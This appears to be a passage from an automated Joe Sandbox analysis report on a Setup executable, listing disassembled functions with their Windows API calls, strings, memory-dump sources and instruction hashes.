                                                                                              • Instruction Fuzzy Hash: BF11AD30A10308EBCB05DF6ACC84E8E3BBAAB05358F420965E411DBA60D370E985CF4E
                                                                                              Function 63967341 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              • ServicesActive, xrefs: 63967354
                                                                                              • OpenSCManager failed with error: %u, xrefs: 63967396
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorH_prolog3Last
                                                                                              • String ID: OpenSCManager failed with error: %u$ServicesActive
                                                                                              • API String ID: 685212868-337506387
                                                                                              • Opcode ID: acd745880a23dd9f0216cfe90f48d2b279ede1e57e2b72d8ca5d6b9d96fbecbc
                                                                                              • Instruction ID: 50314f4851e370cbce0457ea3a68592659ed9389585a4fbe814fed0b682b6465
                                                                                              • Opcode Fuzzy Hash: acd745880a23dd9f0216cfe90f48d2b279ede1e57e2b72d8ca5d6b9d96fbecbc
                                                                                              • Instruction Fuzzy Hash: 2C0124716553028FE7209BA8CC44B5A37B1BF82F28F240438E505DB2C2DB70D8008F50
                                                                                              Function 63957F0A Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 63957F11
                                                                                                • Part of subcall function 6395E8E8: __EH_prolog3.LIBCMT ref: 6395E8EF
                                                                                                • Part of subcall function 639660A8: __EH_prolog3.LIBCMT ref: 639660AF
                                                                                                • Part of subcall function 6394B8EF: __EH_prolog3.LIBCMT ref: 6394B8F6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3
                                                                                              • String ID: complete$Action$Enumerating incompatible services
                                                                                              • API String ID: 431132790-2452571594
                                                                                              • Opcode ID: e250445e0f6c0017c4549d617c272251a944e9623f864c85f50c8ffbf6956486
                                                                                              • Instruction ID: 957bee477fb2821919b6ecd4c8f2e876381e5dcc5ab59857b12aef7809208864
                                                                                              • Opcode Fuzzy Hash: e250445e0f6c0017c4549d617c272251a944e9623f864c85f50c8ffbf6956486
                                                                                              • Instruction Fuzzy Hash: 2E116D32800258EFCF11EBD4C900ADE7BB5AF1AB14F14405AF154AB252C775CA55EFA1
                                                                                              Function 63961360 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 42COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,Action,6397FE10,?,?,?,205ABF9D,Action,?,00000000), ref: 63961395
                                                                                              • GetLastError.KERNEL32(?,?,?,205ABF9D,Action,?,00000000), ref: 639613A5
                                                                                                • Part of subcall function 6394C71B: __EH_prolog3.LIBCMT ref: 6394C722
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: DiskErrorFreeH_prolog3LastSpace
                                                                                              • String ID: Action$GetDiskFreeSpaceEx
                                                                                              • API String ID: 3776785849-3943406023
                                                                                              • Opcode ID: 89374e042ae7f81f457b0360166ccd3c2c0edc4e6ab125e2b69ee0ade3dde879
                                                                                              • Instruction ID: ead5decd5bd7568311890101d4da1882bcdbbc12c493ebf07eaf872828aec118
                                                                                              • Opcode Fuzzy Hash: 89374e042ae7f81f457b0360166ccd3c2c0edc4e6ab125e2b69ee0ade3dde879
                                                                                              • Instruction Fuzzy Hash: 47014BB6D04219AF8B00EF99C8448EFBBB9EB99700B008449F511F7205E770A709CF90
                                                                                              Function 639578D5 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 39COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 639578DC
                                                                                                • Part of subcall function 639683FD: _memcpy_s.LIBCMT ref: 6396844E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3_memcpy_s
                                                                                              • String ID: Not Visible$Visible$[%u] [%s] [%s] [%s]
                                                                                              • API String ID: 1212206098-88040887
                                                                                              • Opcode ID: 48940536b87696f0480960b87f08ca8f572790f91160e313f474d57ded443679
                                                                                              • Instruction ID: 93ab9a04bb51a4256e2d7a13daa7d181afa8c8a90f7acb33ce13f2dbbcef247f
                                                                                              • Opcode Fuzzy Hash: 48940536b87696f0480960b87f08ca8f572790f91160e313f474d57ded443679
                                                                                              • Instruction Fuzzy Hash: 4F017CB5505646AFDB11CFA8C804B8DBBB0FF26A04F048540F8589B302D734E920CFE1
                                                                                              Function 6C5EA6A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 26libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(netapi32,NetGetJoinInformation,00000007), ref: 6C5EA6C4
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 6C5EA6CB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressLibraryLoadProc
                                                                                              • String ID: NetGetJoinInformation$netapi32
                                                                                              • API String ID: 2574300362-2552388246
                                                                                              • Opcode ID: 9da9b6813b5a1ee17a37df7ca5b0b6df8888ecfc0e307c9337ae8427ba66dbe6
                                                                                              • Instruction ID: b92e3303c6b2cfdf3e4f80e06e7b7a24269a105c0510e65e966bef3ed8246647
                                                                                              • Opcode Fuzzy Hash: 9da9b6813b5a1ee17a37df7ca5b0b6df8888ecfc0e307c9337ae8427ba66dbe6
                                                                                              • Instruction Fuzzy Hash: F6E08071A883469BD64056B95D04A673BB8575B375B110511F529C1CC1D770E400991C
                                                                                              Function 6C5EA703 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 26libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleA.KERNEL32(netapi32,NetApiBufferFree,00000007), ref: 6C5EA727
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 6C5EA72E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressHandleModuleProc
                                                                                              • String ID: NetApiBufferFree$netapi32
                                                                                              • API String ID: 1646373207-4116497281
                                                                                              • Opcode ID: 16ad16307735b5c8a92e9965fdaf5f98c544e7a9b4025c9a94a8357b47308b2f
                                                                                              • Instruction ID: 4f6e0bde6b9f51a0e4602b61a1787c02142e6ae2cdc3e3fa8776b04a7f1e082e
                                                                                              • Opcode Fuzzy Hash: 16ad16307735b5c8a92e9965fdaf5f98c544e7a9b4025c9a94a8357b47308b2f
                                                                                              • Instruction Fuzzy Hash: 01E0867164830696EA50D6BB6C58A7B3EB84B99334B260911F929C9CC1DB74E8408618
                                                                                              Function 6C5EA8F1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 24synchronizationCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • OpenEventA.KERNEL32(00100000,00000000,Global\TabletHardwarePresent), ref: 6C5EA902
                                                                                              • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 6C5EA910
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 6C5EA91E
                                                                                              Strings
                                                                                              • Global\TabletHardwarePresent, xrefs: 6C5EA8F5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseEventHandleObjectOpenSingleWait
                                                                                              • String ID: Global\TabletHardwarePresent
                                                                                              • API String ID: 1727428665-3144360101
                                                                                              • Opcode ID: 54103bb663a46064da6c3655be55da2db6737a94f3d7b28dc1d3980b3d58fad8
                                                                                              • Instruction ID: c5495d4166117953ae0614c1c47930b7b853b936d8d2b5407d0804739008e7fc
                                                                                              • Opcode Fuzzy Hash: 54103bb663a46064da6c3655be55da2db6737a94f3d7b28dc1d3980b3d58fad8
                                                                                              • Instruction Fuzzy Hash: 5AD01732301230B7863112BAAC0CEAF6D78DBCFEF57071210F84AD36009A208802C1E9
                                                                                              Function 6C5D787B Relevance: 6.4, APIs: 5, Instructions: 108COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 6C5D78C4
                                                                                              • memmove.MSVCRT(?,?,00000001,?,?,00000000,00000000,?,?,00000000,?,?,?,?,?,6C5ED3F8), ref: 6C5E5485
                                                                                              • memset.MSVCRT ref: 6C5E54A4
                                                                                              • memmove.MSVCRT(?,?,00010000,?,?,000000FB,00000000,?,00000000,000000FF,?,?,?,?,?,00000004), ref: 6C5E54C9
                                                                                              • memmove.MSVCRT(?,?,?,?,?,?,?,?,000000FB,00000000,?,00000000,000000FF,?,?,?), ref: 6C5E54F2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: memmove$memset
                                                                                              • String ID:
                                                                                              • API String ID: 3790616698-0
                                                                                              • Opcode ID: 077d26f26fda551de48103a5ceb68b6a756d6473fb55a76aeae2e47fc2184c85
                                                                                              • Instruction ID: b73fbd2e71afa82469375343a7c95c0ac876bab31d0b638d812f35e896712903
                                                                                              • Opcode Fuzzy Hash: 077d26f26fda551de48103a5ceb68b6a756d6473fb55a76aeae2e47fc2184c85
                                                                                              • Instruction Fuzzy Hash: BB315EB2600608AFDB14CE68CD84DAB77EAEB88354B05462CF84AC7B14DB30FE45CB54
                                                                                              Function 6C5D83E5 Relevance: 6.1, APIs: 4, Instructions: 125fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateFileW.KERNEL32(6C5D833E,80010000,00000001,00000000,00000003,00000080,00000000,Function_00007AF4,?,00000000,?,?,?,6C5D833E,?), ref: 6C5D840B
                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,?,?,6C5D833E,?), ref: 6C5D841B
                                                                                              • CloseHandle.KERNEL32(6C5D833E,?,00000000,?,?,?,6C5D833E,?), ref: 6C5D847C
                                                                                                • Part of subcall function 6C5D1967: malloc.MSVCRT(?,6C5F0554), ref: 6C5D1979
                                                                                              • ReadFile.KERNEL32(6C5D833E,00000000,?,6C5D833E,00000000,?,00000000,?,?,?,6C5D833E,?), ref: 6C5D844B
                                                                                                • Part of subcall function 6C5D84A3: GetSystemTime.KERNEL32(00000000,00000000,?,?,?,6C5D833E,?), ref: 6C5D84AF
                                                                                                • Part of subcall function 6C5D84A3: SystemTimeToFileTime.KERNEL32(6C5D833E,6C5D833E,?,?,?,6C5D833E,?), ref: 6C5D84BD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Time$System$CloseCreateHandleReadSizemalloc
                                                                                              • String ID:
                                                                                              • API String ID: 1717276877-0
                                                                                              • Opcode ID: 9cee19d848c2bb2b94916878ce300ee6fcf925ad123b84eb3c270a0059c885bf
                                                                                              • Instruction ID: 8bfcf4568d137b23266600b47dc7cd3cd826618819324c2c74818a45b33c2b3d
                                                                                              • Opcode Fuzzy Hash: 9cee19d848c2bb2b94916878ce300ee6fcf925ad123b84eb3c270a0059c885bf
                                                                                              • Instruction Fuzzy Hash: 5741ED70140380EFCB148F69CC40E6A7FB9EB8539DB22899AF461DAC60D730E9449B99
                                                                                              Function 6C5D84FC Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 117COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 6C5D8551
                                                                                                • Part of subcall function 6C5D18E5: _vsnwprintf.MSVCRT ref: 6C5D1913
                                                                                                • Part of subcall function 6C5D85E1: RegOpenKeyExW.ADVAPI32(6C5D63AF,?,00000000,-00020018,?,00000000,?), ref: 6C5D864C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Open_vsnwprintfmemset
                                                                                              • String ID: %s\%s\%s$Sampling$Software\Microsoft\SQMClient
                                                                                              • API String ID: 3302644324-2697463538
                                                                                              • Opcode ID: 3f82ecc4c0abd419a49a7617212217059e5434d461dec1a09d2c0eebff1bfbfb
                                                                                              • Instruction ID: 1611159e7a0cf1e9ec1f91417ceedc64b6f59958176b512aec80bd9c345cee43
                                                                                              • Opcode Fuzzy Hash: 3f82ecc4c0abd419a49a7617212217059e5434d461dec1a09d2c0eebff1bfbfb
                                                                                              • Instruction Fuzzy Hash: BF41DE31502358BBDB14CE58CC84FEA77A8AB89358F2104C6F514E6996DB31EA84CF99
                                                                                              Function 63970047 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 6397007B
                                                                                              • __isleadbyte_l.LIBCMT ref: 639700AE
                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,63968AB5,?,00000000,00000000,?,?,?,?,63968AB5,00000000), ref: 639700DF
                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,63968AB5,00000001,00000000,00000000,?,?,?,?,63968AB5,00000000), ref: 6397014D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                              • String ID:
                                                                                              • API String ID: 3058430110-0
                                                                                              • Opcode ID: d9ebab114c5bacc672b1ff07e061c621552816f7e71894f10c593d90bbcfb3e3
                                                                                              • Instruction ID: 127cae1e3ad26133d3185c667efd46eae5e68b8fe4c00ff66b19a3fc75ae1f1c
                                                                                              • Opcode Fuzzy Hash: d9ebab114c5bacc672b1ff07e061c621552816f7e71894f10c593d90bbcfb3e3
                                                                                              • Instruction Fuzzy Hash: CC31B231A04249EFDB20DF68C8819AE3BB9FF02761F088569F4609B2D1E732D980DF50
                                                                                              Function 6396017C Relevance: 6.1, APIs: 4, Instructions: 100windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • MapDialogRect.USER32(?,00000000), ref: 639601E4
                                                                                                • Part of subcall function 639691B7: _malloc.LIBCMT ref: 639691D1
                                                                                              • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 6396023D
                                                                                              • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 63960247
                                                                                              • ShowWindow.USER32(?,00000001,?,00000000,?,00000000), ref: 6396024E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$DialogRectShowWindow_malloc
                                                                                              • String ID:
                                                                                              • API String ID: 929715566-0
                                                                                              • Opcode ID: 635e3d57ca36fd0e09148ebbf5488e52b2c12507bb70b930b4b5205e74bf5cec
                                                                                              • Instruction ID: a5b46d3bb938966f13e7e2630414c367b5c4a90ded5d1a85a831b66daf0b0cba
                                                                                              • Opcode Fuzzy Hash: 635e3d57ca36fd0e09148ebbf5488e52b2c12507bb70b930b4b5205e74bf5cec
                                                                                              • Instruction Fuzzy Hash: FA317A75A00209AFDB159F68C849AAEBBF5FF89750F204019F506EB3A0DB319E11CF91
                                                                                              Function 6C5E89C4 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 75COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 6C5E89F4
                                                                                                • Part of subcall function 6C5E5F11: EtwTraceMessage.NTDLL ref: 6C5E5F26
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageTracememset
                                                                                              • String ID: %s\%s$MaxUploadFileSize$Software\Microsoft\SQMClient
                                                                                              • API String ID: 1506953324-2140474114
                                                                                              • Opcode ID: 7c29ece59dcefd5ab2e1bba9860cdb6eb768817b1b88dd5d06e2f3ea5907570a
                                                                                              • Instruction ID: d76f8bfcbbfadda11373159edbdcfde3645697dadf47c1ab3dd83b92f11167e0
                                                                                              • Opcode Fuzzy Hash: 7c29ece59dcefd5ab2e1bba9860cdb6eb768817b1b88dd5d06e2f3ea5907570a
                                                                                              • Instruction Fuzzy Hash: CC21F271A00328AACB11CA0DCC84EEB77B8EB88328F5508D6E924D7951C770DE898F56
                                                                                              Function 63964870 Relevance: 6.0, APIs: 4, Instructions: 49windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 63964877
                                                                                                • Part of subcall function 6394EB19: GetCurrentThreadId.KERNEL32 ref: 6394EB3A
                                                                                                • Part of subcall function 6394EB19: SetWindowsHookExW.USER32(00000005,Function_0000EAF4,00000000,00000000), ref: 6394EB4A
                                                                                                • Part of subcall function 6394EB19: MessageBoxW.USER32(?,?,?), ref: 6394EB5D
                                                                                                • Part of subcall function 6394EB19: UnhookWindowsHookEx.USER32(?), ref: 6394EB6D
                                                                                              • GetParent.USER32(?), ref: 639648A6
                                                                                              • GetSystemMenu.USER32(00000000,00000000,0000F060,00000001,?,6396158F,?,000006F5,?,?,?,00000000,?,00000001), ref: 639648B6
                                                                                              • EnableMenuItem.USER32(00000000,?,6396158F), ref: 639648BD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: HookMenuWindows$CurrentEnableH_prolog3ItemMessageParentSystemThreadUnhook
                                                                                              • String ID:
                                                                                              • API String ID: 267827553-0
                                                                                              • Opcode ID: 7714ea6b59dccdb420381dddeb9bae349e675d40abdca3e55412a634c1e0c387
                                                                                              • Instruction ID: 40f9d26980095638f2c89b8ee7dcfde9e3ebd323d0d233b2e86a36142ccd11b6
                                                                                              • Opcode Fuzzy Hash: 7714ea6b59dccdb420381dddeb9bae349e675d40abdca3e55412a634c1e0c387
                                                                                              • Instruction Fuzzy Hash: 6C112D716417449FEB21EBB8C959F6A77E8EF06F48F000858F592CB691D7B4E8408F20
                                                                                              Function 639691B7 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _malloc.LIBCMT ref: 639691D1
                                                                                                • Part of subcall function 63968FCB: __FF_MSGBANNER.LIBCMT ref: 63968FE4
                                                                                                • Part of subcall function 63968FCB: __NMSG_WRITE.LIBCMT ref: 63968FEB
                                                                                                • Part of subcall function 63968FCB: HeapAlloc.KERNEL32(00000000,00000001,00000000,?,?,?,639691D6,?), ref: 63969010
                                                                                              • std::exception::exception.LIBCMT ref: 63969206
                                                                                              • std::exception::exception.LIBCMT ref: 63969220
                                                                                              • __CxxThrowException@8.LIBCMT ref: 63969231
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: std::exception::exception$AllocException@8HeapThrow_malloc
                                                                                              • String ID:
                                                                                              • API String ID: 1414122017-0
                                                                                              • Opcode ID: 080547e1d9f556410d466d2a0f310f160016ca134a5c2a68788f1c6539977277
                                                                                              • Instruction ID: 5c702f458e8980afbf923f1cec6daec6777dcfbac9cc5fbccdcfa1223a9e296f
                                                                                              • Opcode Fuzzy Hash: 080547e1d9f556410d466d2a0f310f160016ca134a5c2a68788f1c6539977277
